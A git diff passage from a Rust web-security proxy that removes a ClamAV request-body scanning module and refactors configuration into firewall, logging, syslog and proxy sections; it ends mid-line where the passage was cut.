+++ /dev/null @@ -1,652 +0,0 @@ -use anyhow::{Result, anyhow}; -use clamav_tcp::scan; -use serde::{Deserialize, Serialize}; -use std::io::Cursor; -use std::sync::{Arc, RwLock, OnceLock}; -use std::collections::HashMap; -use std::net::SocketAddr; -use hyper::http::request::Parts; -use wirefilter::{ExecutionContext, Scheme, Filter}; -use bytes::Bytes; -use multer::Multipart; - -/// Content scanning configuration -#[derive(Debug, Clone, Deserialize, Serialize)] -pub struct ContentScanningConfig { - /// Enable or disable content scanning - pub enabled: bool, - /// ClamAV server address (e.g., "localhost:3310") - pub clamav_server: String, - /// Maximum file size to scan in bytes (default: 10MB) - pub max_file_size: usize, - /// Content types to scan (empty means scan all) - pub scan_content_types: Vec, - /// Skip scanning for specific file extensions - pub skip_extensions: Vec, - /// Wirefilter expression to determine when to scan - #[serde(default = "default_scan_expression")] - pub scan_expression: String, -} - -fn default_scan_expression() -> String { - "http.request.method eq \"POST\" or http.request.method eq \"PUT\"".to_string() -} - -impl Default for ContentScanningConfig { - fn default() -> Self { - Self { - enabled: false, - clamav_server: "localhost:3310".to_string(), - max_file_size: 10 * 1024 * 1024, // 10MB - scan_content_types: vec![ - "text/html".to_string(), - "application/x-www-form-urlencoded".to_string(), - "multipart/form-data".to_string(), - "application/json".to_string(), - "text/plain".to_string(), - ], - skip_extensions: vec![], - scan_expression: default_scan_expression(), - } - } -} - -/// Content scanning result -#[derive(Debug, Clone)] -pub struct ScanResult { - /// Whether malware was detected - pub malware_detected: bool, - /// Malware signature name if detected - pub signature: Option, - /// Error message if scanning failed - pub error: Option, -} - -/// Content scanner implementation -pub struct ContentScanner { - config: Arc>, - scheme: Arc, - filter: Arc>>, -} - -/// Extract boundary from Content-Type header for multipart content -pub fn extract_multipart_boundary(content_type: &str) -> Option { - // Content-Type format: multipart/form-data; boundary=----WebKitFormBoundary... - if !content_type.to_lowercase().contains("multipart/") { - return None; - } - - for part in content_type.split(';') { - let trimmed = part.trim(); - let lower = trimmed.to_lowercase(); - if lower.starts_with("boundary=") { - // Find the actual position of "boundary=" in the original string (case-insensitive) - if let Some(eq_pos) = trimmed.to_lowercase().find("boundary=") { - let boundary = trimmed[eq_pos + 9..].trim(); - // Remove quotes if present - let boundary = boundary.trim_matches('"').trim_matches('\''); - return Some(boundary.to_string()); - } - } - } - - None -} - -impl ContentScanner { - /// Create a new content scanner - pub fn new(config: ContentScanningConfig) -> Self { - let scheme = Self::create_scheme(); - let filter = Self::compile_filter(&scheme, &config.scan_expression); - - Self { - config: Arc::new(RwLock::new(config)), - scheme: Arc::new(scheme), - filter: Arc::new(RwLock::new(filter)), - } - } - - /// Create the wirefilter scheme for content scanning - fn create_scheme() -> Scheme { - let builder = wirefilter::Scheme! { - http.request.method: Bytes, - http.request.path: Bytes, - http.request.content_type: Bytes, - http.request.content_length: Int, - }; - builder.build() - } - - /// Compile the scan expression filter - fn compile_filter(scheme: &Scheme, expression: &str) -> Option { - if expression.is_empty() { - return None; - } - - match scheme.parse(expression) { - Ok(ast) => Some(ast.compile()), - Err(e) => { - log::error!("Failed to compile content scanning expression '{}': {}", expression, e); - None - } - } - } - - /// Update scanner configuration - pub fn update_config(&self, config: ContentScanningConfig) { - let new_filter = Self::compile_filter(&self.scheme, &config.scan_expression); - - if let Ok(mut guard) = self.config.write() { - *guard = config; - } - if let Ok(mut guard) = self.filter.write() { - *guard = new_filter; - } - } - - /// Check if content scanning should be performed for this request - pub fn should_scan(&self, req_parts: &Parts, body_bytes: &[u8], _peer_addr: SocketAddr) -> bool { - let config = match self.config.read() { - Ok(guard) => guard.clone(), - Err(_) => return false, - }; - - if !config.enabled { - log::debug!("Content scanning disabled"); - return false; - } - - log::debug!("Checking if should scan request: method={}, path={}, body_size={}", - req_parts.method, req_parts.uri.path(), body_bytes.len()); - - // Check wirefilter expression first - let filter_guard = match self.filter.read() { - Ok(guard) => guard, - Err(_) => return false, - }; - - if let Some(ref filter) = *filter_guard { - let mut ctx = ExecutionContext::new(&self.scheme); - - // Set request fields - let method = req_parts.method.as_str(); - let path = req_parts.uri.path(); - let content_type = req_parts.headers - .get("content-type") - .and_then(|h| h.to_str().ok()) - .unwrap_or(""); - let content_length = body_bytes.len() as i64; - - if ctx.set_field_value(self.scheme.get_field("http.request.method").unwrap(), method).is_err() { - return false; - } - if ctx.set_field_value(self.scheme.get_field("http.request.path").unwrap(), path).is_err() { - return false; - } - if ctx.set_field_value(self.scheme.get_field("http.request.content_type").unwrap(), content_type).is_err() { - return false; - } - if ctx.set_field_value(self.scheme.get_field("http.request.content_length").unwrap(), content_length).is_err() { - return false; - } - - // Execute filter - match filter.execute(&ctx) { - Ok(result) => { - if !result { - log::debug!("Skipping content scan: expression does not match"); - return false; - } else { - log::debug!("Expression matched, proceeding with content scan checks"); - log::debug!("Expression result: {:?}", result); - } - } - Err(e) => { - log::error!("Failed to execute content scanning expression: {}", e); - return false; - } - } - } else { - log::debug!("No scan expression configured, allowing scan"); - } - - // Check if body is too large - if body_bytes.len() > config.max_file_size { - log::debug!("Skipping content scan: body too large ({} bytes)", body_bytes.len()); - return false; - } - - // Check content type - if let Some(content_type) = req_parts.headers.get("content-type") { - if let Ok(content_type_str) = content_type.to_str() { - let content_type_lower = content_type_str.to_lowercase(); - - // If specific content types are configured, only scan those - if !config.scan_content_types.is_empty() { - let should_scan = config.scan_content_types.iter() - .any(|ct| content_type_lower.contains(ct)); - if !should_scan { - log::debug!("Skipping content scan: content type '{}' not in scan list: {:?}", - content_type_str, config.scan_content_types); - return false; - } else { - log::debug!("Content type '{}' matches scan list", content_type_str); - } - } - - // Skip certain content types - if content_type_lower.contains("image/") || - content_type_lower.contains("video/") || - content_type_lower.contains("audio/") { - log::debug!("Skipping content scan: binary content type {}", content_type_str); - return false; - } - } - } - - // Check file extension from URL path - if let Some(path) = req_parts.uri.path().split('/').last() { - if let Some(extension) = std::path::Path::new(path).extension() { - if let Some(ext_str) = extension.to_str() { - let ext_lower = format!(".{}", ext_str.to_lowercase()); - if config.skip_extensions.contains(&ext_lower) { - log::debug!("Skipping content scan: file extension {} in skip list", ext_lower); - return false; - } - } - } - } - - log::debug!("All checks passed, will scan content"); - true - } - - /// Scan content for malware - pub async fn scan_content(&self, body_bytes: &[u8]) -> Result { - let config = match self.config.read() { - Ok(guard) => guard.clone(), - Err(_) => return Err(anyhow!("Failed to read scanner config")), - }; - - if !config.enabled { - return Ok(ScanResult { - malware_detected: false, - signature: None, - error: None, - }); - } - - self.scan_bytes(&config.clamav_server, body_bytes).await - } - - /// Internal method to scan bytes with ClamAV - async fn scan_bytes(&self, clamav_server: &str, data: &[u8]) -> Result { - // Create a cursor over the body bytes for scanning - let mut cursor = Cursor::new(data); - - // Perform the scan - match scan(clamav_server, &mut cursor, None) { - Ok(result) => { - // Check if malware was detected using the new API - if !result.is_infected { - Ok(ScanResult { - malware_detected: false, - signature: None, - error: None, - }) - } else { - // Extract signature name from detected_infections - let signature = if !result.detected_infections.is_empty() { - Some(result.detected_infections.join(", ")) - } else { - None - }; - - Ok(ScanResult { - malware_detected: true, - signature, - error: None, - }) - } - } - Err(e) => { - log::error!("ClamAV scan failed: {}", e); - Ok(ScanResult { - malware_detected: false, - signature: None, - error: Some(format!("Scan failed: {}", e)), - }) - } - } - } - - /// Scan multipart content for malware by parsing parts and scanning each individually - pub async fn scan_multipart_content(&self, body_bytes: &[u8], boundary: &str) -> Result { - let config = match self.config.read() { - Ok(guard) => guard.clone(), - Err(_) => return Err(anyhow!("Failed to read scanner config")), - }; - - if !config.enabled { - return Ok(ScanResult { - malware_detected: false, - signature: None, - error: None, - }); - } - - log::debug!("Parsing multipart body with boundary: {}", boundary); - - // Create a multipart parser - let stream = futures::stream::once(async move { - Result::::Ok(Bytes::copy_from_slice(body_bytes)) - }); - - let mut multipart = Multipart::new(stream, boundary); - - let mut parts_scanned = 0; - let mut parts_failed = 0; - - // Iterate over each part in the multipart body - while let Some(field) = multipart.next_field().await.map_err(|e| anyhow!("Failed to read multipart field: {}", e))? { - let field_name = field.name().unwrap_or("").to_string(); - let field_filename = field.file_name().map(|s| s.to_string()); - let field_content_type = field.content_type().map(|m| m.to_string()); - - log::debug!("Scanning multipart field: name={}, filename={:?}, content_type={:?}", - field_name, field_filename, field_content_type); - - // Read the entire field into bytes - let field_bytes = field.bytes().await.map_err(|e| anyhow!("Failed to read field bytes: {}", e))?; - - // Skip empty fields - if field_bytes.is_empty() { - log::debug!("Skipping empty multipart field: {}", field_name); - continue; - } - - // Check if field size exceeds max_file_size - if field_bytes.len() > config.max_file_size { - log::debug!("Skipping multipart field '{}': size {} exceeds max_file_size {}", - field_name, field_bytes.len(), config.max_file_size); - continue; - } - - parts_scanned += 1; - - // Scan this part - match self.scan_bytes(&config.clamav_server, &field_bytes).await { - Ok(result) => { - if result.malware_detected { - log::info!("Malware detected in multipart field '{}' (filename: {:?}): signature {:?}", - field_name, field_filename, result.signature); - - // Return immediately on first malware detection - return Ok(ScanResult { - malware_detected: true, - signature: result.signature.map(|s| format!("{}:{}", field_name, s)), - error: None, - }); - } - } - Err(e) => { - log::warn!("Failed to scan multipart field '{}': {}", field_name, e); - parts_failed += 1; - } - } - } - - log::debug!("Multipart scan complete: {} parts scanned, {} failed", parts_scanned, parts_failed); - - // If all parts failed to scan, return an error - if parts_scanned > 0 && parts_failed == parts_scanned { - return Ok(ScanResult { - malware_detected: false, - signature: None, - error: Some(format!("All {} multipart parts failed to scan", parts_failed)), - }); - } - - // No malware detected - Ok(ScanResult { - malware_detected: false, - signature: None, - error: None, - }) - } - - /// Scan HTML form data for malware - pub async fn scan_form_data(&self, form_data: &HashMap) -> Result { - let config = match self.config.read() { - Ok(guard) => guard.clone(), - Err(_) => return Err(anyhow!("Failed to read scanner config")), - }; - - if !config.enabled { - return Ok(ScanResult { - malware_detected: false, - signature: None, - error: None, - }); - } - - // Combine all form values into a single string for scanning - let combined_data = form_data.values() - .map(|v| v.as_str()) - .collect::>() - .join("\n"); - - let mut cursor = Cursor::new(combined_data.as_bytes()); - - // Perform the scan - match scan(&config.clamav_server, &mut cursor, None) { - Ok(result) => { - // Check if malware was detected using the new API - if !result.is_infected { - Ok(ScanResult { - malware_detected: false, - signature: None, - error: None, - }) - } else { - // Extract signature name from detected_infections - let signature = if !result.detected_infections.is_empty() { - Some(result.detected_infections.join(", ")) - } else { - None - }; - - Ok(ScanResult { - malware_detected: true, - signature, - error: None, - }) - } - } - Err(e) => { - log::error!("ClamAV form data scan failed: {}", e); - Ok(ScanResult { - malware_detected: false, - signature: None, - error: Some(format!("Form data scan failed: {}", e)), - }) - } - } - } -} - -// Global content scanner instance -static CONTENT_SCANNER: OnceLock = OnceLock::new(); - -/// Get the global content scanner instance -pub fn get_global_content_scanner() -> Option<&'static ContentScanner> { - CONTENT_SCANNER.get() -} - -/// Set the global content scanner instance -pub fn set_global_content_scanner(scanner: ContentScanner) -> Result<()> { - CONTENT_SCANNER - .set(scanner) - .map_err(|_| anyhow!("Failed to initialize content scanner")) -} - -/// Initialize the global content scanner with default configuration -pub fn init_content_scanner(config: ContentScanningConfig) -> Result<()> { - let scanner = ContentScanner::new(config); - set_global_content_scanner(scanner)?; - log::info!("Content scanner initialized"); - Ok(()) -} - -/// Update the global content scanner configuration -pub fn update_content_scanner_config(config: ContentScanningConfig) -> Result<()> { - if let Some(scanner) = get_global_content_scanner() { - scanner.update_config(config); - log::info!("Content scanner configuration updated"); - Ok(()) - } else { - Err(anyhow!("Content scanner not initialized")) - } -} - -#[cfg(test)] -mod tests { - use super::*; - use hyper::http::request::Builder; - - #[test] - fn test_content_scanner_config_default() { - let config = ContentScanningConfig::default(); - assert!(!config.enabled); - assert_eq!(config.clamav_server, "localhost:3310"); - assert_eq!(config.max_file_size, 10 * 1024 * 1024); - assert!(!config.scan_content_types.is_empty()); - assert!(config.skip_extensions.is_empty()); - } - - #[test] - fn test_should_scan_disabled() { - use std::net::{Ipv4Addr, SocketAddr}; - - let config = ContentScanningConfig { - enabled: false, - ..Default::default() - }; - let scanner = ContentScanner::new(config); - - let req = Builder::new() - .method("POST") - .uri("http://example.com/test") - .body(()) - .unwrap(); - let (req_parts, _) = req.into_parts(); - let peer_addr = SocketAddr::new(Ipv4Addr::new(127, 0, 0, 1).into(), 8080); - - assert!(!scanner.should_scan(&req_parts, b"test content", peer_addr)); - } - - #[test] - fn test_should_scan_content_type_filter() { - use std::net::{Ipv4Addr, SocketAddr}; - - let config = ContentScanningConfig { - enabled: true, - scan_content_types: vec!["text/html".to_string()], - ..Default::default() - }; - let scanner = ContentScanner::new(config); - - let req = Builder::new() - .method("POST") - .uri("http://example.com/test") - .header("content-type", "text/html") - .body(()) - .unwrap(); - let (req_parts, _) = req.into_parts(); - let peer_addr = SocketAddr::new(Ipv4Addr::new(127, 0, 0, 1).into(), 8080); - - assert!(scanner.should_scan(&req_parts, b"test", peer_addr)); - - let req2 = Builder::new() - .method("POST") - .uri("http://example.com/test") - .header("content-type", "application/json") - .body(()) - .unwrap(); - let (req_parts2, _) = req2.into_parts(); - - assert!(!scanner.should_scan(&req_parts2, b"{\"test\": \"data\"}", peer_addr)); - } - - #[test] - fn test_should_scan_file_size_limit() { - use std::net::{Ipv4Addr, SocketAddr}; - - let config = ContentScanningConfig { - enabled: true, - max_file_size: 100, - ..Default::default() - }; - let scanner = ContentScanner::new(config); - - let req = Builder::new() - .method("POST") - .uri("http://example.com/test") - .body(()) - .unwrap(); - let (req_parts, _) = req.into_parts(); - let peer_addr = SocketAddr::new(Ipv4Addr::new(127, 0, 0, 1).into(), 8080); - - let small_content = b"small"; - let large_content = b"x".repeat(200); - - assert!(scanner.should_scan(&req_parts, small_content, peer_addr)); - assert!(!scanner.should_scan(&req_parts, &large_content, peer_addr)); - } - - #[test] - fn test_extract_multipart_boundary() { - // Test with standard format - let ct1 = "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"; - assert_eq!( - extract_multipart_boundary(ct1), - Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) - ); - - // Test with quoted boundary - let ct2 = "multipart/form-data; boundary=\"----WebKitFormBoundary7MA4YWxkTrZu0gW\""; - assert_eq!( - extract_multipart_boundary(ct2), - Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) - ); - - // Test with spaces - let ct3 = "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW "; - assert_eq!( - extract_multipart_boundary(ct3), - Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) - ); - - // Test with charset and boundary - let ct4 = "multipart/form-data; charset=utf-8; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"; - assert_eq!( - extract_multipart_boundary(ct4), - Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) - ); - - // Test non-multipart content type - let ct5 = "application/json"; - assert_eq!(extract_multipart_boundary(ct5), None); - - // Test missing boundary - let ct6 = "multipart/form-data"; - assert_eq!(extract_multipart_boundary(ct6), None); - - // Test mixed case - let ct7 = "Multipart/Form-Data; Boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"; - assert_eq!( - extract_multipart_boundary(ct7), - Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) - ); - } -} diff --git a/src/app_state.rs b/src/core/app_state.rs similarity index 61% rename from src/app_state.rs rename to src/core/app_state.rs index 04361fb..cef94e6 100644 --- a/src/app_state.rs +++ b/src/core/app_state.rs @@ -1,12 +1,11 @@ -use crate::{bpf}; +use crate::firewall::{FirewallBackend, IptablesFirewall, NftablesFirewall}; +use crate::logger::bpf_stats::BpfStatsCollector; +use crate::utils::fingerprint::tcp_fingerprint::TcpFingerprintCollector; use std::sync::{Arc, Mutex}; -use crate::bpf_stats::BpfStatsCollector; -use crate::firewall::{FirewallBackend, NftablesFirewall, IptablesFirewall}; -use crate::utils::tcp_fingerprint::TcpFingerprintCollector; #[derive(Clone)] pub struct AppState { - pub skels: Vec>>, + pub skels: Vec>>, pub ifindices: Vec, pub bpf_stats_collector: BpfStatsCollector, pub tcp_fingerprint_collector: TcpFingerprintCollector, diff --git a/src/cli.rs b/src/core/cli.rs similarity index 50% rename from src/cli.rs rename to src/core/cli.rs index 1c3bc82..63f471f 100644 --- a/src/cli.rs +++ b/src/core/cli.rs @@ -1,11 +1,17 @@ -use std::{path::PathBuf, env}; +use std::{env, path::PathBuf}; use anyhow::Result; use clap::Parser; use clap::ValueEnum; use serde::{Deserialize, Serialize}; -use crate::waf::actions::captcha::CaptchaProvider; +use crate::security::waf::actions::captcha::CaptchaProvider; + +#[derive(Debug, Default, Clone)] +pub struct ConfigDiagnostics { + pub warnings: Vec, + pub errors: Vec, +} /// TLS operating mode #[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, ValueEnum)] @@ -43,30 +49,22 @@ pub struct Config { // Global server options (moved from server section) #[serde(default)] - pub redis: RedisConfig, - #[serde(default)] pub network: NetworkConfig, + #[serde(default)] + pub firewall: FirewallConfig, #[serde(default, alias = "arxignis")] pub platform: Gen0SecConfig, #[serde(default)] - pub geoip: GeoipConfig, - #[serde(default)] - pub content_scanning: ContentScanningCliConfig, - #[serde(default)] pub logging: LoggingConfig, #[serde(default)] - pub bpf_stats: BpfStatsConfig, - #[serde(default)] - pub tcp_fingerprint: TcpFingerprintConfig, - #[serde(default)] pub daemon: DaemonConfig, - #[serde(default)] - pub pingora: PingoraConfig, - #[serde(default)] - pub acme: AcmeConfig, + #[serde(default, alias = "pingora")] + pub proxy: ProxyConfig, } -fn default_mode() -> String { "agent".to_string() } +fn default_mode() -> String { + "agent".to_string() +} #[derive(Debug, Clone, Serialize, Deserialize, Default)] pub struct ProxyProtocolConfig { @@ -76,8 +74,12 @@ pub struct ProxyProtocolConfig { pub timeout_ms: u64, } -fn default_proxy_protocol_enabled() -> bool { false } -fn default_proxy_protocol_timeout() -> u64 { 1000 } +fn default_proxy_protocol_enabled() -> bool { + false +} +fn default_proxy_protocol_timeout() -> u64 { + 1000 +} #[derive(Debug, Clone, Serialize, Deserialize, Default)] pub struct HealthCheckConfig { @@ -93,12 +95,21 @@ pub struct HealthCheckConfig { pub allowed_cidrs: Vec, } -fn default_health_check_enabled() -> bool { true } -fn default_health_check_endpoint() -> String { "/health".to_string() } -fn default_health_check_port() -> String { "0.0.0.0:8080".to_string() } -fn default_health_check_methods() -> Vec { vec!["GET".to_string(), "HEAD".to_string()] } -fn default_health_check_allowed_cidrs() -> Vec { vec![] } - +fn default_health_check_enabled() -> bool { + true +} +fn default_health_check_endpoint() -> String { + "/health".to_string() +} +fn default_health_check_port() -> String { + "0.0.0.0:8080".to_string() +} +fn default_health_check_methods() -> Vec { + vec!["GET".to_string(), "HEAD".to_string()] +} +fn default_health_check_allowed_cidrs() -> Vec { + vec![] +} #[derive(Debug, Clone, Serialize, Deserialize, Default)] pub struct RedisConfig { @@ -130,16 +141,20 @@ pub struct NetworkConfig { pub iface: String, #[serde(default)] pub ifaces: Vec, - #[serde(default)] - pub disable_xdp: bool, /// IP version support mode: "ipv4", "ipv6", or "both" (default: "both") /// Note: XDP requires IPv6 to be enabled at kernel level for attachment, /// even in IPv4-only mode. Set to "ipv4" to skip XDP if IPv6 cannot be enabled. #[serde(default = "default_ip_version")] pub ip_version: String, +} + +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct FirewallConfig { /// Firewall backend mode: auto, xdp, nftables, iptables, none #[serde(default)] - pub firewall_mode: crate::firewall::FirewallMode, + pub mode: crate::firewall::FirewallMode, + #[serde(default)] + pub disable_xdp: bool, } fn default_ip_version() -> String { @@ -161,16 +176,12 @@ pub struct Gen0SecConfig { pub include_response_body: bool, #[serde(default = "default_max_body_size")] pub max_body_size: usize, - #[serde(default)] - pub captcha: CaptchaConfig, } fn default_base_url() -> String { "https://api.gen0sec.com/v1".to_string() } - - fn default_log_sending_enabled() -> bool { true } @@ -227,23 +238,118 @@ pub struct ContentScanningCliConfig { pub clamav_server: String, #[serde(default = "default_max_file_size")] pub max_file_size: usize, +} + +fn default_scanning_enabled() -> bool { + false +} +fn default_clamav_server() -> String { + "localhost:3310".to_string() +} +fn default_max_file_size() -> usize { + 10 * 1024 * 1024 +} + +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct SyslogLevelsConfig { + #[serde(default = "default_syslog_error_level")] + pub error: String, + #[serde(default = "default_syslog_app_level")] + pub app: String, + #[serde(default = "default_syslog_access_level")] + pub access: String, +} + +fn default_syslog_error_level() -> String { + "err".to_string() +} +fn default_syslog_app_level() -> String { + "info".to_string() +} +fn default_syslog_access_level() -> String { + "info".to_string() +} + +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct SyslogConfig { #[serde(default)] - pub scan_content_types: Vec, + pub enabled: bool, + #[serde(default = "default_syslog_facility")] + pub facility: String, + #[serde(default = "default_syslog_identifier")] + pub identifier: String, #[serde(default)] - pub skip_extensions: Vec, - #[serde(default = "default_scan_expression")] - pub scan_expression: String, + pub levels: SyslogLevelsConfig, } -fn default_scanning_enabled() -> bool { false } -fn default_clamav_server() -> String { "localhost:3310".to_string() } -fn default_max_file_size() -> usize { 10 * 1024 * 1024 } -fn default_scan_expression() -> String { "http.request.method eq \"POST\" or http.request.method eq \"PUT\"".to_string() } +fn default_syslog_facility() -> String { + "daemon".to_string() +} +fn default_syslog_identifier() -> String { + "synapse".to_string() +} #[derive(Debug, Clone, Serialize, Deserialize, Default)] pub struct LoggingConfig { #[serde(default)] pub level: String, + /// Enable file-based logging (errors and access logs to separate files) + #[serde(default = "default_file_logging_enabled")] + pub file_logging_enabled: bool, + /// Directory for log files + #[serde(default = "default_log_directory")] + pub log_directory: String, + /// Maximum size for log files before rotation (bytes) + #[serde(default = "default_max_log_size")] + pub max_log_size: u64, + /// Number of rotated log files to keep + #[serde(default = "default_log_file_count")] + pub log_file_count: u32, + /// Syslog configuration + #[serde(default)] + pub syslog: SyslogConfig, + /// BPF statistics logging configuration + #[serde(default)] + pub bpf_stats: BpfStatsConfig, + /// TCP fingerprinting logging configuration + #[serde(default)] + pub tcp_fingerprint: TcpFingerprintConfig, +} + +fn default_file_logging_enabled() -> bool { + false +} +fn default_log_directory() -> String { + "/var/log/synapse".to_string() +} +fn default_max_log_size() -> u64 { + 100 * 1024 * 1024 +} // 100MB +fn default_log_file_count() -> u32 { + 10 +} + +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct InternalServicesConfig { + /// Enable the internal services server (captcha verification + ACME endpoints) + #[serde(default = "default_internal_services_enabled")] + pub enabled: bool, + /// Port to bind the internal services server to + #[serde(default = "default_internal_services_port")] + pub port: u16, + /// IP address to bind the internal services server to + #[serde(default = "default_internal_services_bind_ip")] + pub bind_ip: String, +} + +fn default_internal_services_enabled() -> bool { + true +} +fn default_internal_services_port() -> u16 { + 9180 +} +fn default_internal_services_bind_ip() -> String { + "127.0.0.1".to_string() } #[derive(Debug, Clone, Serialize, Deserialize, Default)] @@ -263,10 +369,21 @@ pub struct CaptchaConfig { } impl Config { - pub fn load_from_file(path: &PathBuf) -> Result { + pub fn load_from_file(path: &PathBuf) -> Result<(Self, ConfigDiagnostics)> { let content = std::fs::read_to_string(path)?; - let config: Config = serde_yaml::from_str(&content)?; - Ok(config) + let mut unused = Vec::new(); + let deserializer = serde_yaml::Deserializer::from_str(&content); + let config: Config = + serde_ignored::deserialize(deserializer, |path| unused.push(path.to_string()))?; + let mut diagnostics = ConfigDiagnostics::default(); + if !unused.is_empty() { + diagnostics.warnings.push(format!( + "Unused config options in {}: {}", + path.display(), + unused.join(", ") + )); + } + Ok((config, diagnostics)) } pub fn default() -> Self { @@ -274,17 +391,14 @@ impl Config { mode: "agent".to_string(), multi_thread: None, worker_threads: None, - redis: RedisConfig { - url: "redis://127.0.0.1/0".to_string(), - prefix: "ax:synapse".to_string(), - ssl: None, - }, network: NetworkConfig { iface: "eth0".to_string(), ifaces: vec![], - disable_xdp: false, ip_version: "both".to_string(), - firewall_mode: crate::firewall::FirewallMode::default(), + }, + firewall: FirewallConfig { + mode: crate::firewall::FirewallMode::default(), + disable_xdp: false, }, platform: Gen0SecConfig { api_key: "".to_string(), @@ -293,72 +407,37 @@ impl Config { log_sending_enabled: true, include_response_body: true, max_body_size: 1024 * 1024, // 1MB - captcha: CaptchaConfig { - site_key: None, - secret_key: None, - jwt_secret: None, - provider: "hcaptcha".to_string(), - token_ttl: 7200, - cache_ttl: 300, - }, - }, - geoip: GeoipConfig { - country: GeoipDatabaseConfig { - url: "".to_string(), - path: None, - headers: None, - refresh_secs: None, - }, - asn: GeoipDatabaseConfig { - url: "".to_string(), - path: None, - headers: None, - refresh_secs: None, - }, - city: GeoipDatabaseConfig { - url: "".to_string(), - path: None, - headers: None, - refresh_secs: None, - }, - refresh_secs: 28800, - }, - content_scanning: ContentScanningCliConfig { - enabled: false, - clamav_server: "localhost:3310".to_string(), - max_file_size: 10 * 1024 * 1024, - scan_content_types: vec![ - "text/html".to_string(), - "application/x-www-form-urlencoded".to_string(), - "multipart/form-data".to_string(), - "application/json".to_string(), - "text/plain".to_string(), - ], - skip_extensions: vec![], - scan_expression: default_scan_expression(), }, logging: LoggingConfig { level: "info".to_string(), + file_logging_enabled: false, + log_directory: "/var/log/synapse".to_string(), + max_log_size: 100 * 1024 * 1024, + log_file_count: 10, + syslog: SyslogConfig::default(), + bpf_stats: BpfStatsConfig::default(), + tcp_fingerprint: TcpFingerprintConfig::default(), }, - bpf_stats: BpfStatsConfig::default(), - tcp_fingerprint: TcpFingerprintConfig::default(), daemon: DaemonConfig::default(), - pingora: PingoraConfig::default(), - acme: AcmeConfig::default(), + proxy: ProxyConfig::default(), } } pub fn merge_with_args(&mut self, args: &Args) { // Override config values with command line arguments if provided + // Network interface overrides + if !args.iface.is_empty() && args.iface != "eth0" { + self.network.iface = args.iface.clone(); + } if !args.ifaces.is_empty() { self.network.ifaces = args.ifaces.clone(); } if args.disable_xdp { - self.network.disable_xdp = true; + self.firewall.disable_xdp = true; } if let Some(ref mode) = args.firewall_mode { - self.network.firewall_mode = match mode.to_lowercase().as_str() { + self.firewall.mode = match mode.to_lowercase().as_str() { "auto" => crate::firewall::FirewallMode::Auto, "xdp" => crate::firewall::FirewallMode::Xdp, "nftables" => crate::firewall::FirewallMode::Nftables, @@ -373,7 +452,9 @@ impl Config { if let Some(api_key) = &args.arxignis_api_key { self.platform.api_key = api_key.clone(); } - if !args.arxignis_base_url.is_empty() && args.arxignis_base_url != "https://api.gen0sec.com/v1" { + if !args.arxignis_base_url.is_empty() + && args.arxignis_base_url != "https://api.gen0sec.com/v1" + { self.platform.base_url = args.arxignis_base_url.clone(); } if let Some(log_sending_enabled) = args.arxignis_log_sending_enabled { @@ -382,24 +463,24 @@ impl Config { self.platform.include_response_body = args.arxignis_include_response_body; self.platform.max_body_size = args.arxignis_max_body_size; if args.captcha_site_key.is_some() { - self.platform.captcha.site_key = args.captcha_site_key.clone(); + self.proxy.captcha.site_key = args.captcha_site_key.clone(); } if args.captcha_secret_key.is_some() { - self.platform.captcha.secret_key = args.captcha_secret_key.clone(); + self.proxy.captcha.secret_key = args.captcha_secret_key.clone(); } if args.captcha_jwt_secret.is_some() { - self.platform.captcha.jwt_secret = args.captcha_jwt_secret.clone(); + self.proxy.captcha.jwt_secret = args.captcha_jwt_secret.clone(); } if let Some(provider) = &args.captcha_provider { - self.platform.captcha.provider = format!("{:?}", provider).to_lowercase(); + self.proxy.captcha.provider = format!("{:?}", provider).to_lowercase(); } // Proxy protocol configuration overrides if args.proxy_protocol_enabled { - self.pingora.proxy_protocol.enabled = true; + self.proxy.protocol.enabled = true; } if args.proxy_protocol_timeout != 1000 { - self.pingora.proxy_protocol.timeout_ms = args.proxy_protocol_timeout; + self.proxy.protocol.timeout_ms = args.proxy_protocol_timeout; } // Daemon configuration overrides @@ -412,12 +493,6 @@ impl Config { if args.daemon_working_dir != "/" { self.daemon.working_directory = args.daemon_working_dir.clone(); } - if args.daemon_stdout != "/var/log/synapse.out" { - self.daemon.stdout = args.daemon_stdout.clone(); - } - if args.daemon_stderr != "/var/log/synapse.err" { - self.daemon.stderr = args.daemon_stderr.clone(); - } if args.daemon_user.is_some() { self.daemon.user = args.daemon_user.clone(); } @@ -425,12 +500,193 @@ impl Config { self.daemon.group = args.daemon_group.clone(); } - // Redis configuration overrides + // Redis configuration overrides (moved to proxy.redis) if !args.redis_url.is_empty() && args.redis_url != "redis://127.0.0.1/0" { - self.redis.url = args.redis_url.clone(); + self.proxy.redis.url = args.redis_url.clone(); } if !args.redis_prefix.is_empty() && args.redis_prefix != "ax:synapse" { - self.redis.prefix = args.redis_prefix.clone(); + self.proxy.redis.prefix = args.redis_prefix.clone(); + } + + // Mode override + if let Some(ref mode) = args.mode { + self.mode = mode.clone(); + } + + // Network IP version override + if let Some(ref ip_version) = args.network_ip_version { + self.network.ip_version = ip_version.clone(); + } + + // Threat MMDB configuration overrides + if let Some(ref url) = args.threat_mmdb_url { + self.platform.threat.url = url.clone(); + } + if let Some(ref path) = args.threat_mmdb_path { + self.platform.threat.path = Some(PathBuf::from(path)); + } + if let Some(refresh_secs) = args.threat_mmdb_refresh_secs { + self.platform.threat.refresh_secs = Some(refresh_secs); + } + + // Logging file configuration overrides + if let Some(enabled) = args.file_logging_enabled { + self.logging.file_logging_enabled = enabled; + } + if let Some(ref dir) = args.log_directory { + self.logging.log_directory = dir.clone(); + } + if let Some(size) = args.max_log_size { + self.logging.max_log_size = size; + } + if let Some(count) = args.log_file_count { + self.logging.log_file_count = count; + } + + // Syslog configuration overrides + if let Some(enabled) = args.syslog_enabled { + self.logging.syslog.enabled = enabled; + } + if let Some(ref 